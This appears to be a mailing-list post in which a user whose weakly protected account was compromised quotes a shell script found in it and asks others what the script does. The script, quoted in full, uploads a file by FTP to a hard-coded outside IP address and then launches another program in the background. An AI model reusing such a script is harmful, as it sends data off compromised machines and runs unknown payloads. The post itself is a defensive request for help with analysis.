Re: Phishing Attempt

Mark wrote:
I received a notice from my ISP regarding a phishing attempt traced to my IP address. This was my fault, as I left open an account with a trivial password.

The account home directory contained a simple shell script of just over a dozen lines I can't see what it's doing there.

Now three questions:

1. Is it bad form to reproduce the script or other relevant info here?

2. Would somebody be able to tell me what it does, and how harmful it is?

3. Would it mean that I have been cracked?

Thanks,

Mark

OK below is the text of the script as it was sent back to me. I can normally understand shell scripts, but I can't see what this one is doing.

=20

#!/bin/sh

HOST=3D'58.105.225.59'

USER=3D'test'

PASSWD=3D'testing'

FILE=3D'1.db'

=20

ftp -n $HOST <<END_SCRIPT

quote USER $USER

quote PASS $PASSWD

put $FILE

quit

END_SCRIPT

sleep 70

../pula &

exit 0

=20

=20
.